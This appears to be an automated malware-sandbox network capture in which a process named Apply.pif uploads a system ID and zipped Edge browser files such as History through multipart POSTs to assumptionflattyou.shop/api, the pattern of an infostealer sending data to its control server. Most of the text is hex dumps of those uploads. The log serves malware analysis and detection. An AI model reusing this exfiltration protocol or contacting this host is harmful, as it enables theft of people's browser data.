                                                  Date: Wed, 24 Jul 2024 19:05:16 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=c3v90c9omo9l418pgmjtt30ngu; expires=Sun, 17-Nov-2024 12:51:55 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Vhc9AIQ82homXfykS2RyWexoakG0jCfwMBDRT96K27DLrmuGhFWpibhmpOhYxV5CD%2FQOWNibVCxqXDSNIZzfiL0pajEES8L08%2FDoB3I64iCg%2BcSgBdjiCJdST1daabR2qZhW74X7INYdg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8a862e447aa75e62-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-07-24 19:05:16 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                                                  Data Ascii: eok 8.46.123.33
                                                  2024-07-24 19:05:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.549736172.67.163.544436488C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif
                                                  TimestampBytes transferredDirectionData
                                                  2024-07-24 19:05:17 UTC289OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 16226
                                                  Host: assumptionflattyou.shop
                                                  2024-07-24 19:05:17 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 32 31 46 35 37 46 45 35 34 35 43 39 31 38 39 34 32 43 32 44 43 30 30 33 45 30 33 44 36 31 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 5a 61 6b 69
                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A21F57FE545C918942C2DC003E03D613--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@Zaki
                                                  2024-07-24 19:05:17 UTC895OUTData Raw: ff 95 7c b9 c5 22 00 01 01 1a 6c 65 76 65 6c 64 62 2e 42 79 74 65 77 69 73 65 43 6f 6d 70 61 72 61 74 6f 72 02 00 03 02 04 00 50 4b 07 08 a0 1c 50 7b 2e 00 00 00 29 00 00 00 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 18 4d 89 51 12 00 00 00 0d 00 00 00 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 64 67 65 2f 42 72 6f 77 73 65 72 56 65 72 73 69 6f 6e 2e 74 78 74 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 1f 06 f1 34 25 00 00 00 20 00 00 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 57 00 00 00 45 64 67 65 2f 64 70 2e 74 78 74 50 4b 01 02 00 00 14 00 08 08 08 00 00 00 00 00 7f 06 10 18 41 0b 00 00 00 60 02 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 b5 00 00 00 45 64 67 65 2f 44 65 66 61 75 6c 74 2f 48 69 73 74 6f 72 79 50 4b 01 02 00
                                                  Data Ascii: |"leveldb.BytewiseComparatorPKP{.)PKMQEdge/BrowserVersion.txtPK4% WEdge/dp.txtPKA`Edge/Default/HistoryPK
                                                  2024-07-24 19:05:18 UTC822INHTTP/1.1 200 OK
                                                  Date: Wed, 24 Jul 2024 19:05:18 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=hvssn7ke36e0f39kd6a5oi066d; expires=Sun, 17-Nov-2024 12:51:56 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=61U19%2BtnfZpz8p4uKw%2B4LYSM6HAqWP5cvUYQvLlNJUzv%2BpXlsb6ZPHILxr0L21irpYJpNV957JNh3b4XLbwXuIBLHTC%2BGYJbDXC98CL6eOQBdJt%2F2r%2B12QuXg%2FOZ%2B8k2Hb35O1XSXbaEZw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8a862e4d89647cab-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-07-24 19:05:18 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                                                  Data Ascii: eok 8.46.123.33
                                                  2024-07-24 19:05:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.564745172.67.163.544436488C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif
                                                  TimestampBytes transferredDirectionData
                                                  2024-07-24 19:05:19 UTC289OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 20570
                                                  Host: assumptionflattyou.shop
                                                  2024-07-24 19:05:19 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 32 31 46 35 37 46 45 35 34 35 43 39 31 38 39 34 32 43 32 44 43 30 30 33 45 30 33 44 36 31 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 5a 61 6b 69
                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A21F57FE545C918942C2DC003E03D613--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@Zaki
                                                  2024-07-24 19:05:19 UTC5239OUTData Raw: 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii: 56vMMZh'F3Wun 4F([:7s~X`nO
                                                  2024-07-24 19:05:19 UTC812INHTTP/1.1 200 OK
                                                  Date: Wed, 24 Jul 2024 19:05:19 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=a0nhkse3g6jcee69s6stbupbrk; expires=Sun, 17-Nov-2024 12:51:58 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WUXI7YyfFMll6wuzpDmvr16oSu5qaPj4uuRrx4HXZLWugTYqpljSv8plkHJ%2BAbIZ%2BCVdfzPp89MBiUgVisvmAo0Ze1GQNFUVozbxFPZbx6Bf6n26uc0KPof83Paw7lOS2nfQ27us%2FdVFYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8a862e563c2d42bf-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-07-24 19:05:19 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                                                  Data Ascii: eok 8.46.123.33
                                                  2024-07-24 19:05:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.564747172.67.163.544436488C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif
                                                  TimestampBytes transferredDirectionData
                                                  2024-07-24 19:05:20 UTC288OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 1270
                                                  Host: assumptionflattyou.shop
                                                  2024-07-24 19:05:20 UTC1270OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 32 31 46 35 37 46 45 35 34 35 43 39 31 38 39 34 32 43 32 44 43 30 30 33 45 30 33 44 36 31 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 5a 61 6b 69
                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A21F57FE545C918942C2DC003E03D613--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@Zaki
                                                  2024-07-24 19:05:21 UTC814INHTTP/1.1 200 OK
                                                  Date: Wed, 24 Jul 2024 19:05:21 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=1gkmkd62gh3fq5or3hjugr2fpt; expires=Sun, 17-Nov-2024 12:52:00 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Pn4UDgdsiZWQwJFbpkG1WXZ41Uh9ba7jji1yJ%2BHh6zob%2FVQtWDoPIG3Qf%2B9F9x0eIl3xvTAJi9HFRVKiD%2FIJ6hXwvxrTy3Bqz07Egk1gzzik33OGrMQW94T0QnJNkDlqba2I09cIjhIt3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8a862e6218b432fa-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-07-24 19:05:21 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                                                  Data Ascii: eok 8.46.123.33
                                                  2024-07-24 19:05:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.564748172.67.163.544436488C:\Users\user\AppData\Local\Temp\7ZipSfx.000\5758\Apply.pif
                                                  TimestampBytes transferredDirectionData
                                                  2024-07-24 19:05:22 UTC290OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 555626
                                                  Host: assumptionflattyou.shop
                                                  2024-07-24 19:05:22 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 32 31 46 35 37 46 45 35 34 35 43 39 31 38 39 34 32 43 32 44 43 30 30 33 45 30 33 44 36 31 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 5a 61 6b 69
                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"A21F57FE545C918942C2DC003E03D613--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@Zaki
                                                  2024-07-24 19:05:22 UTC15331OUTData Raw: 3c 9b 78 17 86 d3 a2 3a 2d 03 bd c6 c9 29 96 f2 a6 30 0a 22 3e 86 8e 08 42 94 3f 11 a5 c5 18 da 09 c1 a2 03 3b fa 55 a9 79 4e 6d 8e 89 7c 43 f3 f5 c1 7c 55 b7 f3 56 f8 41 ed d6 31 bb 1f 63 35 46 56 bb 58 b5 9d 77 27 1d 5e 0d 0f ca db bd ce 60 5f b1 fb d1 3a e3 58 ea eb 78 f9 9b 35 8a 31 da 9c aa 65 0b ba af 05 e3 59 b8 a4 54 74 21 ff a2 7f 65 20 59 9d a9 4a b9 f7 12 07 ba 4f c9 d3 9c 46 3a 72 f4 51 54 24 71 ef be 2d b3 47 53 13 0f ba 4b f5 40 cd 67 0c 38 6b 7d 1e 11 74 84 fe 02 74 61 97 16 4d 05 b5 c0 3e 7e 8b a2 67 4c d1 67 17 9c 30 15 de c7 bc fd e6 a5 46 a1 b2 88 9c 5c c4 a5 dd d9 fb 75 fd bc 8e bf 2e 30 31 fa d4 82 ed 90 f2 36 7d 52 fb e1 3b fe c4 bc d9 1a cb 0d 7d cb 34 39 df b0 62 43 8a b7 ec 1b 2d 83 25 e9 bb 65 f3 d1 3e 1a 03 ef a7 52 e5 10 cd e9
                                                  Data Ascii: <x:-)0">B?;UyNm|C|UVA1c5FVXw'^`_:Xx51eYTt!e YJOF:rQT$q-GSK@g8k}ttaM>~gLg0F\u.016}R;}49bC-%e>R
                                                  2024-07-24 19:05:22 UTC15331OUTData Raw: e4 01 67 a3 01 5c 5d 01 9a 64 90 88 fd 08 9a ea 8f 6a 84 9d 2a 7b e0 2d 14 e3 f7 11 ae d9 4e cd bc 52 e8 18 99 95 52 66 2b 8a 2a 11 99 0b c0 63 64 ce ad 69 5f e8 a7 63 60 ad dd 72 1e 6b bb 80 67 97 04 3f 3e b7 ad 00 a2 e2 ac f6 7c 45 7a c0 0f f9 ee ab 03 7f de 3e a2 8c 39 d3 8d cb 36 6b cb d9 b1 8c b0 14 3f ee 42 b0 a3 ef 57 13 e3 44 cc 52 f8 4d 86 61 06 3b e7 0e 92 e7 15 9f a2 01 93 bc 5d a1 07 05 90 f4 3e 05 b6 54 24 65 93 5b 7c 3a 7c 51 d4 0c 5e a9 fc 5d 35 c7 d9 99 5e db bf a6 29 15 f8 19 85 8c f5 f3 bb bd 56 4a 2d 28 f5 06 72 ba 7b 52 3c 2a 52 e7 ad ba 3e d8 3a 12 9f 64 5b f2 99 82 75 6b c1 7a 13 e1 0a 1e 5e ce bf cc ac da 96 91 ba 04 42 1c 22 23 e6 c4 7a 85 79 26 a7 6b ac 39 07 15 33 54 96 ad f6 64 d6 1b 0f 1c 07 b9 16 54 8e f4 fe c4 ed 49 03 63 3b
                                                  Data Ascii: g\]dj*{-NRRf+*cdi_c`rkg?>|Ez>96k?BWDRMa;]>T$e[|:|Q^]5^)VJ-(r{R<*R>:d[ukz^B"#zy&k93TdTIc;
                                                  2024-07-24 19:05:22 UTC15331OUTData Raw: 70 de 2a 3f cc 75 15 1e 8c 38 d8 bf f9 c1 48 87 57 78 05 3b fe a8 86 b5 df 69 03 22 c7 8f ab 26 59 67 bd 6f ba 05 20 af 7f 24 a7 f6 a2 14 f1 1d 5a 34 7f ec fd 8f d1 ea da 6a 3d 11 11 d6 c5 f3 42 a1 57 8a 25 10 7a 81 66 38 b3 07 5e e8 53 75 5d bb 2e 46 24 a6 08 91 5b 5b b6 4e a7 66 df 8f 74 ff 8c cb 88 d6 f3 b0 9a 6b fa f9 7e b2 4c 29 e6 f4 79 92 db 92 fa c6 17 37 4f 31 6b 16 a1 f1 4f c3 20 d2 1c fa cc ce ee f6 4e 9a 38 8b bb b0 24 0d ed f6 7c ea 9b 9c 58 f5 40 f6 5a 0d 2e 98 68 4c 76 66 26 c8 4b e2 98 71 1e d3 10 31 06 8f 71 15 a8 eb dd fc 12 9a 2e 6d 6e 46 83 61 dd d1 62 41 6a 7d 65 c0 7c f2 2e 45 02 bb 84 7a 64 e8 75 8a 90 19 7e 7e 3e 39 c0 76 76 ce 37 b1 15 4d dc fd 68 40 1a 26 91 c9 ce 64 88 9c 7f d7 72 68 56 91 a4 54 dd 2b 98 30 f5 60 76 4e bb de c8
                                                  Data Ascii: p*?u8HWx;i"&Ygo $Z4j=BW%zf8^Su].F$[[Nftk~L)y7O1kO N8$|X@Z.hLvf&Kq1q.mnFabAj}e|.Ezdu~~>9vv7Mh@&drhVT+0`vN
                                                  2024-07-24 19:05:22 UTC15331OUTData Raw: df d5 47 8d 00 d0 18 c0 6a 57 b1 c9 be 23 23 3f 05 6c 06 1c 7c 42 ae 43 e9 9b 4e 52 2a 82 a2 ad 8e 4b 87 5f f5 28 58 8e a4 3d bc eb 3e 48 1f 9b a4 a6 ca d7 bb 49 2f fc 80 68 8a d8 d0 47 f3 a3 33 c0 67 a0 f3 8e 40 fb ff 2b 8b ad 49 ff fb 93 23 13 e4 93 b8 a2 60 94 4c c3 ae 7a 0c a7 d3 53 80 cd 08 f6 f4 0f 81 14 5e 90 95 6b 1c c5 38 05 48 b3 79 3e 9c 46 d3 33 31 d1 f0 c7 d9 d8 33 61 0a 40 02 c5 38 25 e4 aa 82 54 ce 92 5b 47 39 76 45 3d 88 0c 15 03 67 dd d2 b1 b0 5a d8 0d a9 95 df 6e 28 6a 54 b0 18 ea 56 cd 69 5a 1c ca 01 24 bf 75 6b a4 30 0d 1d 21 8c 28 71 dc 78 00 d9 93 50 2f 27 e8 57 da dc 34 1f 1b 9a 7d bd 8d 44 ca 1f c4 4d 52 29 71 9b b7 9e 31 bb 24 f8 ec e4 d3 9f aa 41 ae 42 04 e9 b0 53 7e a0 74 99 d6 c2 77 a4 de 62 b6 4e cc 55 5a b6 ad 83 9e a9 79 e1
                                                  Data Ascii: GjW##?l|BCNR*K_(X=>HI/hG3g@+I#`LzS^k8Hy>F313a@8%T[G9vE=gZn(jTViZ$uk0!(qxP/'W4}DMR)q1$ABS~twbNUZy
                                                  2024-07-24 19:05:22 UTC15331OUTData Raw: e8 77 f1 9b 8d 01 9d aa aa 0b e8 bc be 54 67 97 6f 07 77 b3 8a 6e 84 fe cc 0e 54 3b 29 0b 3d dd 4f d5 7d b2 c5 7c 3b d8 d3 56 2f df fc 9f 3e 55 64 ba 02 44 55 c2 01 b3 bf e4 cd 2c a7 0c 67 88 96 47 f5 19 57 39 b4 44 04 e7 c9 89 70 de e1 41 14 1c a7 c1 ee da 83 43 21 bc e4 c7 27 a5 0b c5 87 4d ce bd ef df 0e 0e de b6 78 84 f3 df 78 f0 20 7c 71 10 c4 3e 80 6f 44 bb f0 60 fc 8e 55 5a c9 c7 99 32 9d 5b 55 c0 49 92 84 ca 3c 19 a8 a6 7c 87 c8 26 69 51 5b 07 11 9d 45 54 a0 47 1f 59 0a f2 9b bf 09 9a b9 1d 2d 9b 36 98 92 2b 38 5a bd 50 96 c7 dd a6 a0 e6 43 21 63 b3 48 ad 18 15 b2 fc 08 85 a9 d1 e9 b9 49 5c 24 80 01 cc 0e f6 f3 6d 36 8a 4c 29 6c 3c 44 ed 46 35 54 09 c6 41 2a 93 2d 07 50 95 c9 2a cd 6f ff 36 0b 16 80 3d 51 b0 3e 57 f0 d7 23 58 92 d4 f3 a7 11 c5 31
                                                  Data Ascii: wTgownT;)=O}|;V/>UdDU,gGW9DpAC!'Mxx |q>oD`UZ2[UI<|&iQ[ETGY-6+8ZPC!cHI\$m6L)l<DF5TA*-P*o6=Q>W#X1
                                                  2024-07-24 19:05:22 UTC15331OUTData Raw: 5f b4 dc 36 e7 fa cc 6f e1 51 b0 4e bf 5f 41 02 a8 58 fb f7 c1 57 c6 8d a6 b4 9d bb 19 d7 de 46 33 e8 1c 88 33 d5 55 f4 1d 62 4a b7 f7 25 ee 37 0e 58 b0 1f 22 a7 8d fb 52 8e 3e 76 29 55 b9 ec 5c 7e e0 c9 5a c0 54 cb a3 05 6f d5 d9 3c 29 50 7c 55 f7 e4 9b 8e 20 c6 27 ce 6e 01 94 76 c5 ca 0d ce 4a 7e 66 73 5f d0 7e 14 95 1d 70 c0 6e 56 90 52 f6 bf 31 ad 07 81 3d 6e 83 30 64 3a 9b 00 f2 79 49 ea 5a c7 07 d8 7d e1 26 c0 04 a6 00 aa a8 2b 4d 84 e0 0c 75 7c 50 69 11 2d e3 e7 eb 71 a2 f3 9f de 12 48 2e ff 37 e6 20 de c9 65 65 23 24 8c 55 42 ac 56 79 e3 e3 67 31 e7 dc a0 46 51 90 73 07 74 7f 76 56 64 6a 73 3c 0e f8 fe ac 96 03 a8 45 a1 d5 01 c9 a0 92 0f a0 b9 36 d8 8c d4 fc 81 60 77 10 16 5d 7e d7 db fe 61 f3 15 35 f1 2a b5 5b 7d b2 7d c7 fa f7 33 b0 bd 2d 2d fa
                                                  Data Ascii: _6oQN_AXWF33UbJ%7X"R>v)U\~ZTo<)P|U 'nvJ~fs_~pnVR1=n0d:yIZ}&+Mu|Pi-qH.7 ee#$UBVyg1FQstvVdjs<E6`w]~a5*[}}3--
                                                  2024-07-24 19:05:22 UTC15331OUTData Raw: 03 1a a7 d8 19 f7 5c 44 2b e5 b0 2b f2 35 6e 71 02 83 52 3d 61 97 76 c9 f7 32 90 ef 99 87 da 20 70 c5 2a df 6b f9 65 75 93 58 14 4b f2 18 02 f3 d8 67 fc 46 3a 8b 9d 0d 0b be b4 d7 46 fa 9f 26 a7 cb f5 84 95 88 31 9d 43 f3 80 4d 85 6c 45 52 f2 4c d2 e3 ee 4c 9b a6 da 1b 5e 2f ec 78 4d 72 7c 49 9a 82 ea 14 35 a0 80 19 9a 49 6f a4 74 33 91 00 d1 2e f1 fd 14 c9 7d 04 3d ee 49 e5 05 df 87 d1 c5 e8 a8 41 3c 70 2b 39 01 e7 75 7f 8c 39 7f 4d c8 59 4f 4f 19 7d ed 7c af b4 c6 03 4e a3 5e 7d 2c 35 1f a3 8f 9b d5 e1 19 17 eb 89 4b da 25 b5 35 3e 64 ac f3 11 0a ec 96 42 5d 9f 5f 70 78 2d 08 32 e5 80 80 63 97 1e 66 eb bc d5 9b 6b 9d 0f 87 df df 33 1d a8 f7 d8 bb 2f 47 33 91 8c ec fd 05 14 84 e2 41 e3 4f 1f a0 d1 30 e1 77 b5 83 6e ac 98 ee 6a 10 78 21 26 6a 65 ec 39 66
                                                  Data Ascii: \D++5nqR=av2 p*keuXKgF:F&1CMlERLL^/xMr|I5Iot3.}=IA<p+9u9MYOO}|N^},5K%5>dB]_px-2cfk3/G3AO0wnjx!&je9f
                                                  2024-07-24 19:05:22 UTC15331OUTData Raw: e1 19 a7 f0 ae 8c 5f 50 d5 03 74 1e 12 64 8e cb bd a7 e6 8d 1a 88 61 3b dc 8d c6 5b 2c e1 b7 86 91 21 e7 ae 54 79 55 62 80 28 63 a5 9f b4 fa 81 8e 64 65 ea 68 d8 cb e4 aa e2 79 03 02 84 70 2f 73 a6 3e d1 56 21 04 0e 89 e5 6f e7 d6 dc c0 84 4d ee b7 38 68 16 23 15 49 1a 6b fb 5b a7 4f d7 20 99 cd eb c5 09 d4 c9 78 99 a2 e3 9b 29 bf 71 d9 2f c9 72 7f af 60 21 c9 f9 53 9c d4 30 2a 8a 9a f2 5a 29 a1 89 77 7b 8e 37 bb 94 bb 7f b0 02 13 0a 82 c5 d8 9b 9e 55 95 c4 89 df b3 dd 78 2d 3b fa 4c 5d b7 33 80 7f 6d 3d 68 5d ff 2f 09 65 a6 09 e5 df a9 18 1b f8 2e a3 ed ce 13 9b ea 4f d9 a7 92 0e fe 14 95 9e 39 45 38 8f bd 66 9a d6 2c b5 91 b4 31 ef fb d6 bc e6 d9 82 1c 4a 35 a5 19 b4 07 e8 40 69 25 02 a3 2c b7 65 7c 0f ac 21 ea 2a 4b 70 4d 4d c9 a7 db 56 7e 36 29 e2 be
                                                  Data Ascii: _Ptda;[,!TyUb(cdehyp/s>V!oM8h#Ik[O x)q/r`!S0*Z)w{7Ux-;L]3m=h]/e.O9E8f,1J5@i%,e|!*KpMMV~6)
